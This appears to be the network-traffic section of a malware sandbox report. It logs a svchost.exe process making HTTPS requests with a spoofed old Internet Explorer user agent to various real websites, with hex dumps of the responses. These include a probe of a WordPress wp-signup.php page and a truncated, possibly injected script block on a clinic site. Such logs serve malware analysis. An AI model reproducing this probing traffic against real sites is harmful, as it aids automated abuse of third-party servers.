                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5442INData Raw: 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20 61 6c 74 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73
                                                                                                                                                                                                                                                                          Data Ascii: er g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg" alt><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoimage-des
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5443INData Raw: 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73 3d 22 67 2d 77 72 61 70 70 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 35 30 22 3e 0a 3c 66 6f 6f 74 65 72 20 69 64 3d 22 67 2d 66 6f
                                                                                                                                                                                                                                                                          Data Ascii: <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class="g-wrapper"><div class="g-container"> <div class="g-grid"><div class="g-block size-50"><footer id="g-fo
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5444INData Raw: 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c 62 72 3e 20 3c 73 74 72 6f 6e 67 3e 48 6f 72 61 72 69 6f 20 64 65 20 41 74 65 6e 63 69 c3 b3 6e 3a 20 44 65 20 4c 75 6e 65 73 20 61 20 56 69 65 72 6e 65 73 20 64 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 31 32 3a 30 30 20 6d 20 79 20 64 65 20 32 3a 30 30 20 70 2e 6d 2e 20 61 20 36 3a 30 30 20 70 2e 6d 2e 0a 3c 2f 62 72
                                                                                                                                                                                                                                                                          Data Ascii: Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <br> <strong>Horario de Atencin: De Lunes a Viernes de 7:00 a.m. a 12:00 m y de 2:00 p.m. a 6:00 p.m.</br
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5446INData Raw: 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 50 42 58 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e
                                                                                                                                                                                                                                                                          Data Ascii: # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</div> </div><div class="g-contact-item"><div class="g-contact-label">PBX</div> <div class="g-contact-text">
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5447INData Raw: 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 6f 74 6f 70 2d 36 38 34 36 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d
                                                                                                                                                                                                                                                                          Data Ascii: 2444-particle" class="g-content g-particle"> <a href="/" title rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clinica San Luis" /></a></div></div><div class="g-block size-33-3"><div id="totop-6846-particle" class="g-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5448INData Raw: 34 35 61 0d 0a 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 20 72 69 67 68 74 3a 30 70 78 3b 20 7a 2d 69 6e 64 65 78 3a 39 39 39 39 39 39 39 39 39 39 39 39 3b 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 22 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61
                                                                                                                                                                                                                                                                          Data Ascii: 45ajs"></script><script type="text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div style="position: fixed; bottom: 0px; right:0px; z-index:999999999999; display:block;"><script language="Ja
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5449INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          29192.168.2.660803185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC4967OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: techtrans.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC4999INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:37 GMT
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC4999INData Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                          Data Ascii: 2c2<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          3192.168.2.65015775.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC86OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: ldh.la.gov
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC87INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:07 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 1346
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                          2023-07-05 06:07:07 UTC87INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          30192.168.2.66088283.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5000OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: dataform.co.uk
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5678INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                          Keep-Alive: timeout=2, max=96
                                                                                                                                                                                                                                                                          Content-Length: 49049
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                          X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                          X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:37 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5679INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5682INData Raw: 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63
                                                                                                                                                                                                                                                                          Data Ascii: eadyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).conc
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5749INData Raw: 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65
                                                                                                                                                                                                                                                                          Data Ascii: 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repe
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5757INData Raw: 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61
                                                                                                                                                                                                                                                                          Data Ascii: ipt' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/a
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5765INData Raw: 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 20 74 79 70 65 3d 22 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e
                                                                                                                                                                                                                                                                          Data Ascii: uk/wp-content/uploads/2023/01/DF-icon-logo.svg" type="" sizes="32x32"/><link rel="apple-touch-icon" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-conten
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5774INData Raw: 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 44 61 74 61 66 6f 72 6d 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78
                                                                                                                                                                                                                                                                          Data Ascii: -text"><span class="menu-text">Dataform</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-tex
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5782INData Raw: 61 72 20 77 70 63 66 37 3d 7b 22 61 70 69 53 65 74 74 69 6e 67 73 22 3a 7b 22 72 6f 6f 74 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 22 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 73 63 72 69 70 74 73 2e 6a 73 3f
                                                                                                                                                                                                                                                                          Data Ascii: ar wpcf7={"apiSettings":{"root":"https:\/\/dataform.co.uk\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.js?


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          31192.168.2.660945104.21.48.207443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5449OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: orlyhotel.com
                                                                                                                                                                                                                                                                          Cookie: django_language=en
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5773INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:37 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Expires: Wed, 05 Jul 2023 05:55:47 GMT
